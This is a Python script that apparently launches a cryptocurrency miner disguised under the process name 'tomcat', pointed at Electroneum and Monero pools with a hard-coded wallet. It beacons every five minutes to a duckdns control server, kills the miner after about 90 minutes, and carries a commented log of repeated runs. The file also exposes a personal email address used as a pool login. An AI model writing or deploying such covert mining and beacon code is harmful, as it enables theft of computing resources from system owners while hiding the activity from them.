import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:04.521233
#2018-02-17 16:04:04.867922
#2018-02-17 17:53:06.138136
#2018-02-17 19:39:05.996404
#2018-02-17 21:28:06.567857
#2018-02-17 23:13:05.554159
#2018-02-18 01:00:08.690532
#2018-02-18 02:49:05.699424
#2018-02-18 04:38:05.264449
#2018-02-18 06:29:05.435530
#2018-02-18 08:18:01.339263
#2018-02-18 10:06:05.452483
#2018-02-18 11:53:01.500004
#2018-02-18 13:38:01.358174
#2018-02-18 15:28:06.716756
#2018-02-18 17:17:05.198093
#2018-02-18 19:06:01.926761
#2018-02-18 20:52:04.008175
#2018-02-18 22:37:03.384273
#2018-02-19 00:26:05.996629
#2018-02-19 02:11:06.053019
#2018-02-19 03:59:01.968863
#2018-02-19 05:44:01.880903
#2018-02-19 07:32:08.236136
#2018-02-19 09:22:02.219292
#2018-02-19 11:11:01.790993
#2018-02-19 12:58:08.716655
#2018-02-19 14:45:10.538978
#2018-02-19 16:35:08.740442
#2018-02-19 18:23:04.519890
#2018-02-19 20:08:06.961765
#2018-02-19 21:57:06.573342
#2018-02-19 23:42:06.755781
#2018-02-20 01:29:02.099446
#2018-02-20 03:18:05.441891
#2018-02-20 05:05:01.874227
#2018-02-20 06:48:07.955876
#2018-02-20 08:35:01.375852
#2018-02-20 10:20:08.392675
#2018-02-20 12:05:08.998917
#2018-02-20 13:52:11.585664
#2018-02-20 15:31:08.037408
#2018-02-20 17:18:07.172566
#2018-02-20 19:07:07.906519
#2018-02-20 20:55:04.229286
#2018-02-20 22:40:06.635693
#2018-02-21 00:24:05.742409
#2018-02-21 02:09:04.374793
#2018-02-21 03:59:01.596798
#2018-02-21 05:46:03.785721
#2018-02-21 07:34:01.863560
#2018-02-21 09:19:05.250204
#2018-02-21 11:08:03.954917
#2018-02-21 12:56:07.285264
#2018-02-21 14:44:01.918532
#2018-02-21 16:31:09.773865
#2018-02-21 18:22:06.204281
#2018-02-21 20:08:01.387847
#2018-02-21 21:57:01.751050
#2018-02-21 23:44:09.113473
#2018-02-22 01:34:01.388237
#2018-02-22 03:22:05.136374
#2018-02-22 05:09:01.631018
#2018-02-22 06:53:01.566390
#2018-02-22 08:40:03.063940
#2018-02-22 10:27:05.712853
#2018-02-22 12:12:09.712210
#2018-02-22 13:59:09.699345
#2018-02-22 15:47:05.024332
#2018-02-22 17:34:10.924498
#2018-02-22 19:20:08.502841
#2018-02-22 21:13:02.010803
#2018-02-22 22:58:04.039823
#2018-02-23 00:46:03.457784
#2018-02-23 02:34:01.843107
#2018-02-23 04:23:04.169583
#2018-02-23 06:09:04.528728
#2018-02-23 07:55:09.392102
#2018-02-23 10:11:06.090400
#2018-02-23 12:05:10.792809
#2018-02-23 13:53:07.953179
#2018-02-23 15:45:17.852134
#2018-02-23 17:31:08.394296
#2018-02-23 19:20:06.699435
#2018-02-23 21:05:04.133019
#2018-02-23 22:51:01.344773
#2018-02-24 00:39:05.723151
#2018-02-24 02:29:07.550963
#2018-02-24 04:20:08.270879
#2018-02-24 06:08:05.113807
#2018-02-24 07:56:07.573683
#2018-02-24 09:41:03.623658
#2018-02-24 11:36:05.413287
#2018-02-24 13:26:05.522952
#2018-02-24 15:14:06.401436
#2018-02-24 17:03:03.915401
#2018-02-24 18:52:03.874138
#2018-02-24 20:41:04.397500
#2018-02-24 22:50:07.939508
#2018-02-25 02:11:03.404148
#2018-02-25 06:01:04.587626
#2018-02-25 11:39:06.890411